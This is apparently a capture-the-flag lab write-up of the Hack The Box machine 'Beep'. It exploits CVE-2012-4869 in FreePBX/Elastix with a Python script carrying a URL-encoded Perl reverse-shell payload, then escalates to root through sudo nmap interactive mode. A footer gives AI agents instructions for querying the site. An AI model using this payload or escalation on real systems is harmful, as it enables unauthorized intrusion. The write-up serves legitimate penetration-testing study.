# Beep Writeup

![](/files/iRx3PZTQMhYTg4hyv3VK)

**Vulnerability Exploited:** FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Executio (CVE-2012-4869)

**System Vulnerable:** 10.10.10.7

**Vulnerability Explanation:** The callme\_startcall function in recordings/misc/callme\_page.php in FreePBX 2.9, 2.10, and earlier allows remote attackers to execute arbitrary commands via the callmenum parameter in a c action.

**Vulnerability Fix:** Applying the patch Unofficial Patch is able to eliminate this problem. The bugfix is ready for download at archives.neohapsis.com. A possible mitigation has been published before and not just after the disclosure of the vulnerability.

**Privilege Escalation Vulnerability:** Misconfiguring permissions can lead to disastrous consequences.

**Vulnerability Fix:** The developer should have conformed to the principle of least privilege and the concept of separation of privileges.

**Severity:&#x20;**<mark style="color:red;">**Critical**</mark>

An initial nmap scan revealed the Apache version 2.2.3 running on port 80.

```
# Nmap 7.92 scan initiated Mon Dec 27 17:16:44 2021 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.13s latency).
Not shown: 987 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
| http-methods: 
|_  Supported Methods: HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: STARTTLS OK Completed UIDPLUS ATOMIC LITERAL+ MAILBOX-REFERRALS IDLE THREAD=REFERENCES IMAP4 SORT LIST-SUBSCRIBED X-NETSCAPE ACL ID URLAUTHA0001 CATENATE ANNOTATEMORE UNSELECT LISTEXT NAMESPACE QUOTA SORT=MODSEQ THREAD=ORDEREDSUBJECT BINARY MULTIAPPEND CHILDREN RENAME RIGHTS=kxte CONDSTORE NO IMAP4rev1
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
| http-methods: 
|_  Supported Methods: HEAD POST OPTIONS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after:  2018-04-07T08:22:08
| MD5:   621a 82b6 cf7e 1afa 5284 1c91 60c8 fbc8
|_SHA-1: 800a c6e7 065e 1198 0187 c452 0d9b 18ef e557 a09f
|_ssl-date: 2021-12-27T23:18:02+00:00; +59m58s from scanner time.
880/tcp   open  unknown
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 59m57s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 27 17:21:27 2021 -- 1 IP address (1 host up) scanned in 283.74 seconds

```

\
The Elastic initial page

![](/files/QRBmn4Loa5S8aRZ7FAwk)

Searching for Elastic public exploits using searchsploit

![](/files/dNIMKZfpY5C9jHyV6M6w)

<https://www.exploit-db.com/exploits/18650>&#x20;

Download the exploit script from the following link: <https://github.com/infosecjunky/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution/blob/master/exploit.py>, then apply the needed changes as follow:

```
#exploit modified by infosecjunky
#https://infosecjunky.com

import urllib2
import ssl

rhost="10.10.10.7"
lhost="10.10.16.10"
lport=9001
extension="233"


ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

# Reverse shell payload

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

… SNIP …

```

Launch a nc listener on the local machine and execute the exploit

```
┌──(root💀kali)-[/root/htb/linux/beep]
└─# python exploit.py
```

Receiving a reverse shell as asterisk user

```
┌──(root💀kali)-[/root/htb/linux/beep]
└─# nc -nlvp 9001                                                                                                1 ⨯
listening on [any] 9001 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.10.7] 40929
whoami
asterisk
```

Spawn a shell using python

```
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-3.2$
```

**user.txt**

```
bash-3.2$ cat user.txt  && hostname && whoami && ip a
cat user.txt  && hostname && whoami && ip a
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
beep
asterisk
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:50:56:b9:f6:86 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.7/24 brd 10.10.10.255 scope global eth0

```

Run sudo -l command to determine what permissions the user asterisk had.

```
bash-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

```

The user asterisk can run nmap command without a password.

Run nmap on interactive mode and escalate to root privilege.

```
bash-3.2$ sudo nmap --interactive
sudo nmap –interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
sh-3.2#
```

**root.txt**

```
sh-3.2# cat root.txt  && hostname && whoami && ip a
cat root.txt  && hostname && whoami && ip a
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
beep
root
sh: ip: command not found
sh-3.2#

```

&#x20;

| Lessons Learned                                                                                                                                                                                                                                                                                                                                                                                                                                                             |
| --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| <ol><li>I presented three ways of rooting the machine. I know of at least two other way (not presented in this writeup) to root the machine including a neat solution by <a href="https://www.youtube.com/watch?v=XJmBpOd__N8">ippsec</a> that involves sending a malicious email to a user of the machine and then executing that email using the LFI vulnerability we exploited in solution #2. I’m sure there are also many other ways that I didn’t think of.</li></ol> |

&#x20;

&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://w43l.gitbook.io/oscp-preparation/htb/htb-linux-boxes/beep-writeup.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.